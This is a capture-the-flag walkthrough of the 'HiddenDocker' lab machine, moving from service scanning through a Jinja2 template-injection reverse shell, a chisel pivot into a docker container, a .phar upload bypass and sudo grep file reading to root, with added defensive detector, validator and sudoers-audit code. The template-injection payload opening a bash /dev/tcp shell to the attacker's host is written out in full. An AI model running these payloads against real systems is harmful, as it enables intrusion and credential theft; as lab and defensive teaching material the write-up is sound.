TheHackersLabs-HiddenDocker Machine Walkthrough (WP)
城南花已开 Lv5

Information gathering

Service detection

```text
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.160 08:00:27:0d:a3:12 (Unknown)
192.168.60.254 00:50:56:e0:e6:12 (Unknown)

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.078 seconds (123.20 hosts/sec). 4 responded
export ip=192.168.60.160
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.160:22
Open 192.168.60.160:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 18:56 CST
Initiating ARP Ping Scan at 18:56
Scanning 192.168.60.160 [1 port]
Completed ARP Ping Scan at 18:56, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:56
Scanning 192.168.60.160 [2 ports]
Discovered open port 22/tcp on 192.168.60.160
Discovered open port 5000/tcp on 192.168.60.160
Completed SYN Stealth Scan at 18:56, 0.08s elapsed (2 total ports)
Nmap scan report for 192.168.60.160
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-01-17 18:56:41 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
5000/tcp open upnp syn-ack ttl 64
MAC Address: 08:00:27:0D:A3:12 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
```

SSTI injection

The usual port 80 is not open; instead, port 5000 is open.

The page turns out to be vulnerable to SSTI (server-side template injection).

Getting user

Let's try to exploit it and get a reverse shell:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/1234 0>&1\'').read() }}

```text
❯ pwncat-cs -lp 4444
[19:08:09] Welcome to pwncat 🐈! __main__.py:164
[19:08:15] received connection from 192.168.60.160:49136 bind.py:84
[19:08:15] 0.0.0.0:4444: normalizing shell path manager.py:957
192.168.60.160:49136: registered new host w/ db manager.py:957
(local) pwncat$
(remote) pepinodemar@hiddendocker:/home/pepinodemar$ ls
Desktop user.txt
(remote) pepinodemar@hiddendocker:/home/pepinodemar$ cat user.txt
324983I5BH34IK53486GH8G
```
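From the defender's side, the payload above leaves a very recognisable trace in the web server's access log. The following added example (my own code, not part of the original walkthrough or of the target application) scores query-string parameters for SSTI indicators: Jinja-style delimiters, the classic arithmetic probe, dunder attribute chains such as `__init__`/`__globals__`, and calls to command-execution functions. The log lines are constructed for the example; the log format, field names and weights are my assumptions, not anything from the page.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format). They are not taken
# from the target machine; the third line carries a payload shaped like the one above.
SAMPLE_LOG = """\
192.168.60.100 - - [17/Jan/2025:18:58:01 +0800] "GET /?name=alice HTTP/1.1" 200 512
192.168.60.100 - - [17/Jan/2025:18:58:07 +0800] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 510
192.168.60.100 - - [17/Jan/2025:19:07:55 +0800] "GET /?name=%7B%7B%20self._TemplateReference__context.cycler.__init__.__globals__.os.popen(%27id%27).read()%20%7D%7D HTTP/1.1" 200 700
192.168.60.100 - - [17/Jan/2025:19:08:12 +0800] "POST /upload HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Indicators ordered from weak to strong evidence; weights add up to a score.
INDICATORS = [
    (re.compile(r'\{\{.*?\}\}|\{%.*?%\}', re.S), 1, "template delimiters"),
    (re.compile(r'\{\{\s*\d+\s*[*+]\s*\d+\s*\}\}'), 2, "arithmetic probe"),
    (re.compile(r'__(?:class|globals|init|subclasses|builtins|mro|import)__'), 3, "dunder attribute chain"),
    (re.compile(r'\b(?:os\.)?(?:popen|system)\s*\(|\bsubprocess\b'), 4, "command execution call"),
]


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded probes are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def score_value(value):
    """Return (score, reasons) for one decoded parameter value."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(value):
            score += weight
            reasons.append(label)
    return score, reasons


def analyze_log(text, threshold=3):
    """Return one finding per request whose query parameters look like SSTI activity."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        best_score, best_reasons, best_param = 0, [], None
        # parse_qsl already percent-decodes once; decode_fully handles extra layers
        for key, raw in parse_qsl(query, keep_blank_values=True):
            score, reasons = score_value(decode_fully(raw))
            if score > best_score:
                best_score, best_reasons, best_param = score, reasons, key
        if best_score >= threshold:
            findings.append({
                "src": m.group("src"), "ts": m.group("ts"),
                "param": best_param, "score": best_score, "reasons": best_reasons,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} param={f['param']} score={f['score']} "
              f"({', '.join(f['reasons'])})")
```

The threshold of 3 means a bare `{{ ... }}` in a parameter is only logged, while the arithmetic probe (often the first thing an attacker sends) and anything touching dunder attributes or `popen`/`system` is raised as a finding; the scoring is a starting point to tune against real traffic, not a finished rule set.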

Huh?! That fast? The user flag came with no effort at all.

So what does this have to do with the machine's name, Docker?

I looked at the IP configuration and found that there is a docker container.

```text
(remote) pepinodemar@hiddendocker:/home/pepinodemar/Desktop$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:0d:a3:12 brd ff:ff:ff:ff:ff:ff
inet 192.168.60.160/24 brd 192.168.60.255 scope global dynamic enp0s3
valid_lft 1453sec preferred_lft 1453sec
inet6 fe80::a00:27ff:fe0d:a312/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:9f:04:9e:e3 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:9fff:fe04:9ee3/64 scope link
valid_lft forever preferred_lft forever
5: veth382bdf9@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 1e:97:a1:df:c8:0b brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::1c97:a1ff:fedf:c80b/64 scope link
valid_lft forever preferred_lft forever
(remote) pepinodemar@hiddendocker:/home/pepinodemar/Desktop$ ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.432 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.045 ms
^C
--- 172.17.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.045/0.238/0.432/0.193 ms
```

There is another user, debian, who is in the same users group as the current user.

```text
(remote) pepinodemar@hiddendocker:/tmp$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
pepinodemar:x:1001:1001:pepinodemar,,,:/home/pepinodemar:/bin/bash

uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
uid=1001(pepinodemar) gid=1001(pepinodemar) grupos=1001(pepinodemar),100(users)
```

I tried switching to that user, but it needs a password, so I gave up on that.

Port forwarding

Let's forward a port with Chisel.

```text
❯ ./chisel server --reverse -p 1234
2025/01/17 19:34:06 server: Reverse tunnelling enabled
2025/01/17 19:34:06 server: Fingerprint tkC/WwgVEbJoMAqQ99fvKnSnl4RHgL0xlTt0BZNZycU=
2025/01/17 19:34:06 server: Listening on http://0.0.0.0:1234
2025/01/17 19:34:29 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
------------------- separator -----------------
# connect from the target machine
(remote) pepinodemar@hiddendocker:/tmp$ ./chisel client 192.168.60.100:1234 R:socks
2025/01/17 12:34:30 client: Connecting to ws://192.168.60.100:1234
2025/01/17 12:34:30 client: Connected (Latency 775.117µs)
```

See Chisel's official documentation for the details of the reverse SOCKS mode.

You'll notice that port 1080 is now open locally:

```text
❯ ss -lnutp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.1:323 0.0.0.0:*
udp UNCONN 0 0 [::1]:323 [::]:*

tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:1080 0.0.0.0:* users:(("chisel",pid=1942699,fd=7))
tcp LISTEN 0 4096 *:1234 *:* users:(("chisel",pid=1942699,fd=5))
tcp LISTEN 0 511 [::]:80 [::]:*
```

Edit the proxychains configuration and launch Firefox through port 1080:

```text
sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 1080
❯ proxychains firefox
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
```

Now visit the docker container.

It turns out to be a dockerlabs machine.

I found that gobuster doesn't seem to go through the proxy.

wfuzz does, though. It found two pages; machine has content, so let's visit it.

```text
❯ proxychains wfuzz -c -u "http://172.17.0.2/FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 31
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://172.17.0.2/FUZZ.php
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000015: 200 141 L 312 W 8116 Ch "index"
000000361: 200 0 L 0 W 0 Ch "upload"
000009849: 200 53 L 104 W 1361 Ch "machine"
```

There is a file upload, but only zip files are allowed.

Try uploading a reverse shell; renaming it to .phar gets it past the check.
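The upload check on this machine looks only at the file name, which is why a `.phar` rename gets through. The following added example (my own code, not the target application's, which is PHP) puts a name-only denylist check next to a stricter validator that combines an extension allowlist, a magic-byte check, a structural parse of the archive, a zip-slip path check on the entries, and a server-chosen storage name. The sample archives and the fake PHP file are constructed in the block; the limits and the set of script extensions are my assumptions.

```python
import hashlib
import io
import os
import zipfile

MAX_UPLOAD_BYTES = 5 * 1024 * 1024            # assumed limit for this example
ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06")     # local file header / empty archive
SCRIPT_EXTS = {".php", ".phar", ".phtml", ".php5", ".phps"}  # assumed set to refuse inside archives


def weak_is_allowed(filename: str) -> bool:
    """Name-only denylist, the kind of check a .phar rename slips past."""
    return not filename.lower().endswith(".php")


def strict_validate(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Every check must pass; the first failure is reported."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "too large"
    # Allowlist the final extension only; a double extension still ends in .zip here,
    # which is fine because the content checks below decide, not the name.
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext != ".zip":
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(ZIP_MAGIC):
        return False, "not a zip container"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if zf.testzip() is not None:
                return False, "corrupt archive"
            for name in zf.namelist():
                norm = os.path.normpath(name)
                # zip-slip: refuse absolute paths and anything escaping the extraction root
                if name.startswith(("/", "\\")) or os.path.isabs(norm) or norm.startswith(".."):
                    return False, f"unsafe entry path {name!r}"
                # assumption: the server extracts the archive under the web root,
                # so server-side script files inside it are refused too
                if os.path.splitext(name)[1].lower() in SCRIPT_EXTS:
                    return False, f"script file {name!r} inside archive"
    except zipfile.BadZipFile:
        return False, "not a valid zip"
    return True, "ok"


def storage_name(data: bytes) -> str:
    """Server-chosen name: the client's filename never reaches the filesystem."""
    return hashlib.sha256(data).hexdigest() + ".zip"


def _build_zip(entries):
    """Build a constructed in-memory archive for the examples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries:
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample uploads (not real files from the machine).
GOOD_ZIP = _build_zip([("notes.txt", "hello")])
SLIP_ZIP = _build_zip([("../../var/www/html/x.txt", "x")])
EVIL_ZIP = _build_zip([("webshell.php", "<?php /* constructed sample */ ?>")])
FAKE_PHAR = b"<?php /* constructed sample, not an archive */ ?>"


if __name__ == "__main__":
    for name, data in [("shell.phar", FAKE_PHAR), ("shell.zip", FAKE_PHAR),
                       ("archive.zip", GOOD_ZIP), ("archive.zip", SLIP_ZIP),
                       ("archive.zip", EVIL_ZIP)]:
        print(f"{name:12} weak={weak_is_allowed(name)!s:5} strict={strict_validate(name, data)}")
```

The point of the ordering is that the cheap checks (size, extension) run first and the expensive one (parsing the archive) runs only on input that already looks like a zip; `storage_name` removes the file name from the attacker's control entirely, so even a name that passed every check cannot pick where or how the file is stored.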

Getting root

Start a listener on the port.

There is a hint under /opt:

```text
❯ pwncat-cs -lp 4444
[20:30:15] Welcome to pwncat 🐈! __main__.py:164
[20:30:19] received connection from 192.168.60.160:46434 bind.py:84
[20:30:20] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
192.168.60.160:46434: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@415560e9ff49:/$ cd /opt/
(remote) www-data@415560e9ff49:/opt$ ls
nota.txt
(remote) www-data@415560e9ff49:/opt$ cat nota.txt
Protege la clave de root, se encuentra en su directorio /root/clave.txt, menos mal que nadie tiene permisos para acceder a ella.
(Translation: Protect the root password; it is in /root/clave.txt. Good thing nobody has permission to access it.)
```

However, www-data turns out to have sudo rights.

Use grep to read the file:

```text
(remote) www-data@415560e9ff49:/opt$ sudo -l
Matching Defaults entries for www-data on 415560e9ff49:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on 415560e9ff49:
(root) NOPASSWD: /usr/bin/cut
(root) NOPASSWD: /usr/bin/grep
(remote) www-data@415560e9ff49:/opt$ sudo grep '' /root/clave.txt
dockerlabsmolamogollon123
```
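The note in /opt was right that the file permissions were fine; the sudoers rules undid them, because any root-run binary that takes a path and prints file contents is an arbitrary file read. The following added example (my own code, not from the walkthrough or from the dockerlabs image) parses `sudo -l` output of the shape shown above and flags rules that grant such binaries as root without an argument restriction, which is the kind of check to run across a fleet before an attacker does. The sample output is modelled on the page's, with two extra rules constructed to show the non-flagged cases; the set of file-reading binaries and the severity labels are my assumptions.

```python
import os
import re

# Sample `sudo -l` output: the two rules from the page plus two constructed ones
# (a restricted systemctl rule and a rule that does not run as root).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on 415560e9ff49:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, use_pty

User www-data may run the following commands on 415560e9ff49:
    (root) NOPASSWD: /usr/bin/cut
    (root) NOPASSWD: /usr/bin/grep
    (root) /usr/bin/systemctl restart apache2
    (deploy) NOPASSWD: /usr/bin/rsync
"""

# "(runas) TAG: TAG: /path/to/cmd args..."; runas may be "user" or "user : group".
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$')

# Assumed set: utilities whose ordinary job is to read a named file and print from it.
FILE_READERS = {"grep", "cut", "cat", "head", "tail"}


def parse_sudo_l(text):
    """Return the user-specification rules from `sudo -l` output as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()       # "root : root" -> "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        argv = m.group("cmd").split()
        rules.append({"runas": runas, "tags": tags, "command": argv[0], "args": argv[1:]})
    return rules


def audit(rules):
    """Return (rule, severity, message) for rules worth a second look."""
    findings = []
    for r in rules:
        as_root = r["runas"] in ("root", "ALL")
        binary = os.path.basename(r["command"])
        if as_root and r["command"] == "ALL":
            findings.append((r, "critical", "ALL commands as root"))
        elif as_root and binary in FILE_READERS and not r["args"]:
            # no fixed arguments in sudoers means the caller chooses the file
            findings.append((r, "high", f"{binary} as root with free arguments: arbitrary file read"))
        elif "NOPASSWD" in r["tags"] and not r["args"]:
            findings.append((r, "medium", "passwordless rule without an argument restriction"))
    return findings


if __name__ == "__main__":
    for rule, severity, msg in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{severity}] ({rule['runas']}) {rule['command']}: {msg}")
```

The fix on the sudoers side is to pin the arguments (a rule for `/usr/bin/grep -c pattern /var/log/app.log` cannot be repointed at `/root/clave.txt`) or, better, not to grant general-purpose text utilities as root at all.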

Got the password.

Back on the host, switch to the root account:

```text
(remote) pepinodemar@hiddendocker:/tmp$ su root
Contraseña:
root@hiddendocker:/tmp# cd ~
root@hiddendocker:~# ls
root.txt
root@hiddendocker:~# cat root.txt
34259435B34IKHB5KL3JB5
```
